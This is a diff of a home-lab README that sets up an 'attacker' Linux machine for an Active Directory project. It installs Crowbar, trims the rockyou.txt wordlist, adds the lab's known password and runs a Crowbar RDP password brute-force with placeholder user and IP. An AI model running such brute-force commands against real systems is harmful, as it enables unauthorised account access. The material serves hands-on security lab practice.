TrystanW02/Active-Directory-Project/Setups-&-Configurations/README.md

 <br>

+## Configure the network (Attacker)

 1. Assign the IP address from the [project breakdown](https://github.com/TrystanW02/Active-Directory-Project?tab=readme-ov-file#project-breakdown)

 <br>

+## Update & upgrade

-2. Update all of the repositories with the following command:
+1. Update all of the repositories with the following command:
 ```
 sudo apt-get update && sudo apt-get upgrade -y
 ```

 <br>

+## Install "Crowbar"

-3. Make a new directory called "ad-project"
+1. Make a new directory called "ad-project"
 ```
 mkdir ad-project
 ```

 <br>

-4. Type the following command to install the application "Crowbar":
+2. Type the following command to install the application "Crowbar":
 ```
 sudo apt-get intall -y crowbar
 ```

 <br>

-5. Type `cd /usr/share/wordlists` >> `sudo gunzip rockyou.txt.gz` to unzip the textfile
+3. Type `cd /usr/share/wordlists` >> `sudo gunzip rockyou.txt.gz` to unzip the textfile

 <br>

-6. Copy the textfile to the new project folder `cp rockyou.txt ~/Desktop/ad-project` >> change into the directory now `cd ~/Desktop/ad-project`
+4. Copy the textfile to the new project folder `cp rockyou.txt ~/Desktop/ad-project` >> change into the directory now `cd ~/Desktop/ad-project`

 <br>

-7. Just to use the first 20 lines, use the following command:
+5. Just to use the first 20 lines, use the following command:
 ```
 head -n 20 rockyou.txt > passwords.txt
 ```

 <br>

-8. To see the contents of the file, use:
+6. To see the contents of the file, use:
 ```
 cat passwords.txt
 ```

 <br>

-9. To edit the file in order to target a specific password, use `nano passwords.txt` >> add the password you've been using to the list >> Ctrl + X to save
+7. To edit the file in order to target a specific password, use `nano passwords.txt` >> add the password you've been using to the list >> Ctrl + X to save

 <br>

-10. To execute the tool, type the following command:
+8. To execute the tool, type the following command:
 ```
 crowbar -b rdp -u [TARGET-USER] -C passwords.txt -s [TARGET-IP/32]
 ```